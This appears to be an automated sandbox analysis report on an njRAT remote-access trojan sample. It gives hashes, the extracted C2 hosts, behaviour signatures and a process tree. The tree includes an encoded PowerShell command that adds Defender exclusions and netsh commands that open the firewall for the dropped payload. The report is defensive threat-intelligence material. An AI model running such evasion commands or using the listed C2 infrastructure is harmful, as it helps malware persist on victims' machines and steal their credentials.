Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    22/07/2023, 19:02

General

  • Target

    shadowscripts.exe

  • Size

    1.2MB

  • MD5

    b0a79b29052cc5c816336f4b62284d9a

  • SHA1

    fbc8b1d5abe62d281e80f469bfbc08f106ad0979

  • SHA256

    12e490b358c0fa22c31181112cbef58b4636f287d586b5ffa412facd5fee3693

  • SHA512

    a9aed2651024fa97164db592d835e4276e5465007c44a3cbafd305556f1b36fa966bcdf6e87cdd3d4373f9beaf32164a4dabd657a5523735511b23a55e65563a

  • SSDEEP

    24576:8D7XBCahuVE5ocC6SC8fsXhugahBsCjz3XH8gohXdHI+1o7R:qlCa4emD6SVfmevjDH8dtHzqR

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

stupids

C2

hakim32.ddns.net:2000

hands-social.at.ply.gg:46242

Mutex

d4529f156f8f79f81b02518c9cf09857

Attributes
  • reg_key

    d4529f156f8f79f81b02518c9cf09857

  • splitter

    |'|'|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 1 TTPs 3 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\shadowscripts.exe
    "C:\Users\Admin\AppData\Local\Temp\shadowscripts.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZgBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAYwBrACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2176
    • C:\Users\Admin\AppData\Local\Temp\FreeScript.exe
      "C:\Users\Admin\AppData\Local\Temp\FreeScript.exe"
      2⤵
      • Executes dropped EXE
      PID:2200
    • C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1532
      • C:\Users\Admin\AppData\Roaming\microsoft\svhost.exe
        "C:\Users\Admin\AppData\Roaming\microsoft\svhost.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:640
    • C:\Users\Admin\AppData\Local\Temp\Server2223.exe
      "C:\Users\Admin\AppData\Local\Temp\Server2223.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Users\Admin\AppData\Local\Temp\server.exe
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Drops autorun.inf file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3036
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
          4⤵
          • Modifies Windows Firewall
          PID:2744
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
          4⤵
          • Modifies Windows Firewall
          PID:1628
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
          4⤵
          • Modifies Windows Firewall
          PID:1856

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\FreeScript.exe

    Filesize

    913KB

    MD5

    799c188cf6df366f4c0f98b8800a4977

    SHA1

    161d6006518879ecba6cf45b29599992d8eadfce

    SHA256

    32e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841

    SHA512

    32a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1

  • C:\Users\Admin\AppData\Local\Temp\Server2223.exe

    Filesize

    93KB

    MD5

    cb7303205cfb306b5f41820e248a9a5a

    SHA1

    46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

    SHA256

    6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

    SHA512

    87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

  • C:\Users\Admin\AppData\Local\Temp\Server2223.exe

    Filesize

    93KB

    MD5

    cb7303205cfb306b5f41820e248a9a5a

    SHA1

    46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

    SHA256

    6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

    SHA512

    87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

  • C:\Users\Admin\AppData\Local\Temp\Server2223.exe

    Filesize

    93KB

    MD5

    cb7303205cfb306b5f41820e248a9a5a

    SHA1

    46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

    SHA256

    6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

    SHA512

    87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

  • C:\Users\Admin\AppData\Local\Temp\melt.txt

    Filesize

    44B

    MD5

    0371617c0582de75186bbd471f349171

    SHA1

    3573ac51c9f32cd1979def85242d3a90bdc9c871

    SHA256

    9979119a3599ecc2dd4149131be8345469e09cba46726f203795d9563d3c0d4a

    SHA512

    f83f66c907bb2a3f0fb3b3a535423e8aed122f1ba4c1a9aa65c84b9649a50ef6871b1b236913e16e3980372663fba969f514c19bd4b83a9a6d9e33bbcb520115

  • C:\Users\Admin\AppData\Local\Temp\server.exe

    Filesize

    93KB

    MD5

    cb7303205cfb306b5f41820e248a9a5a

    SHA1

    46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

    SHA256

    6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

    SHA512

    87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

  • C:\Users\Admin\AppData\Local\Temp\server.exe

    Filesize

    93KB

    MD5

    cb7303205cfb306b5f41820e248a9a5a

    SHA1

    46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

    SHA256

    6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

    SHA512

    87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

  • C:\Users\Admin\AppData\Local\Temp\svhost.exe

    Filesize

    183KB

    MD5

    9e74e4f56a6568d89660627d2ea95ec0

    SHA1

    41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

    SHA256

    7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

    SHA512

    f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

  • C:\Users\Admin\AppData\Local\Temp\svhost.exe

    Filesize

    183KB

    MD5

    9e74e4f56a6568d89660627d2ea95ec0

    SHA1

    41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

    SHA256

    7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

    SHA512

    f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

  • C:\Users\Admin\AppData\Roaming\Microsoft\svhost.exe

    Filesize

    183KB

    MD5

    9e74e4f56a6568d89660627d2ea95ec0

    SHA1

    41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

    SHA256

    7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

    SHA512

    f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

  • C:\Users\Admin\AppData\Roaming\Microsoft\svhost.exe

    Filesize

    183KB

    MD5

    9e74e4f56a6568d89660627d2ea95ec0

    SHA1

    41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

    SHA256

    7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

    SHA512

    f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

  • C:\Users\Admin\AppData\Roaming\app

    Filesize

    5B

    MD5

    d43c5b07c128b116b7bc8faf7b8efa9d

    SHA1

    dd3540ad4ae14b21b665d108cf4570c2dfa6a6fa

    SHA256

    80ad1cc7b3a784dad618a445af0c8cf3efa903f82a814756f2aaa7b57f45791f

    SHA512

    618b01e2b808e1954d011635dfdf63bc75855145208fc5cae33ce09c7e5b43cf978f6511beb311765e6920e728a290c9f9ced7563e40e8ff8d093d50fdc18334

  • C:\Users\Admin\AppData\Roaming\microsoft\svhost.exe

    Filesize

    183KB

    MD5

    9e74e4f56a6568d89660627d2ea95ec0

    SHA1

    41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

    SHA256

    7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

    SHA512

    f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

  • \Users\Admin\AppData\Local\Temp\FreeScript.exe

    Filesize

    913KB

    MD5

    799c188cf6df366f4c0f98b8800a4977

    SHA1

    161d6006518879ecba6cf45b29599992d8eadfce

    SHA256

    32e96ac5e9d2f869ad11ca48401ca8eaeb520027751427145ddb5ab43bce1841

    SHA512

    32a3749f4ef40e9345644c84666207a7c4f0369274cc18f71eecd1eeb6ea22733bc4cc6751f7281bbdff7e0a2187209a6c00653a95d6d39adb4dab06f355e1b1

  • \Users\Admin\AppData\Local\Temp\Server2223.exe

    Filesize

    93KB

    MD5

    cb7303205cfb306b5f41820e248a9a5a

    SHA1

    46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

    SHA256

    6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

    SHA512

    87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

  • \Users\Admin\AppData\Local\Temp\Server2223.exe

    Filesize

    93KB

    MD5

    cb7303205cfb306b5f41820e248a9a5a

    SHA1

    46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

    SHA256

    6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

    SHA512

    87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

  • \Users\Admin\AppData\Local\Temp\server.exe

    Filesize

    93KB

    MD5

    cb7303205cfb306b5f41820e248a9a5a

    SHA1

    46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

    SHA256

    6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

    SHA512

    87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

  • \Users\Admin\AppData\Local\Temp\server.exe

    Filesize

    93KB

    MD5

    cb7303205cfb306b5f41820e248a9a5a

    SHA1

    46f3e78cf65ee3e7ce29cd5e5be226659b7acb90

    SHA256

    6107bff9958f6da87eb56fc2cdf9fd8a2cb916393beac50470926f43256d2130

    SHA512

    87da0c05d48d5daca9132a0c361806b2f1f52d755cc08225a12aed551e9238c3a07b9f30c7953705b399bae57184441dd0287bd00971a29d9c9aa92b1fd7a77a

  • \Users\Admin\AppData\Local\Temp\svhost.exe

    Filesize

    183KB

    MD5

    9e74e4f56a6568d89660627d2ea95ec0

    SHA1

    41c0f2a94e9ee9d6a9fb4e61691f7db600b6305b

    SHA256

    7eaf715a07a16038aabcf93c79a3d7ea27e30ac1ea421dd75eda8158867cb195

    SHA512

    f6b54b2b84418caf3fe68791038ea9d64d2bcf4055319852f40175d17ab44f88cddc1634e830aa43aa0a4eca8cbe8d0047a64eb37277942f16a00c4c9daffe2c

  • memory/640-135-0x00000000020D0000-0x0000000002150000-memory.dmp

    Filesize

    512KB

  • memory/640-116-0x00000000020D0000-0x0000000002150000-memory.dmp

    Filesize

    512KB

  • memory/640-112-0x0000000000820000-0x0000000000854000-memory.dmp

    Filesize

    208KB

  • memory/640-117-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

    Filesize

    9.6MB

  • memory/640-118-0x00000000020D0000-0x0000000002150000-memory.dmp

    Filesize

    512KB

  • memory/640-114-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

    Filesize

    9.6MB

  • memory/640-136-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1476-98-0x0000000074610000-0x0000000074BBB000-memory.dmp

    Filesize

    5.7MB

  • memory/1476-81-0x0000000000850000-0x0000000000890000-memory.dmp

    Filesize

    256KB

  • memory/1476-80-0x0000000074610000-0x0000000074BBB000-memory.dmp

    Filesize

    5.7MB

  • memory/1532-86-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1532-78-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1532-104-0x0000000002020000-0x00000000020A0000-memory.dmp

    Filesize

    512KB

  • memory/1532-79-0x0000000002020000-0x00000000020A0000-memory.dmp

    Filesize

    512KB

  • memory/1532-115-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1532-113-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

    Filesize

    9.6MB

  • memory/1532-75-0x00000000008D0000-0x0000000000904000-memory.dmp

    Filesize

    208KB

  • memory/2176-105-0x0000000074610000-0x0000000074BBB000-memory.dmp

    Filesize

    5.7MB

  • memory/2176-85-0x0000000002710000-0x0000000002750000-memory.dmp

    Filesize

    256KB

  • memory/2176-84-0x0000000002710000-0x0000000002750000-memory.dmp

    Filesize

    256KB

  • memory/2176-83-0x0000000002710000-0x0000000002750000-memory.dmp

    Filesize

    256KB

  • memory/2176-82-0x0000000074610000-0x0000000074BBB000-memory.dmp

    Filesize

    5.7MB

  • memory/3036-99-0x0000000074610000-0x0000000074BBB000-memory.dmp

    Filesize

    5.7MB

  • memory/3036-100-0x00000000003D0000-0x0000000000410000-memory.dmp

    Filesize

    256KB

  • memory/3036-133-0x0000000074610000-0x0000000074BBB000-memory.dmp

    Filesize

    5.7MB

  • memory/3036-134-0x00000000003D0000-0x0000000000410000-memory.dmp

    Filesize

    256KB

  • memory/3036-101-0x0000000074610000-0x0000000074BBB000-memory.dmp

    Filesize

    5.7MB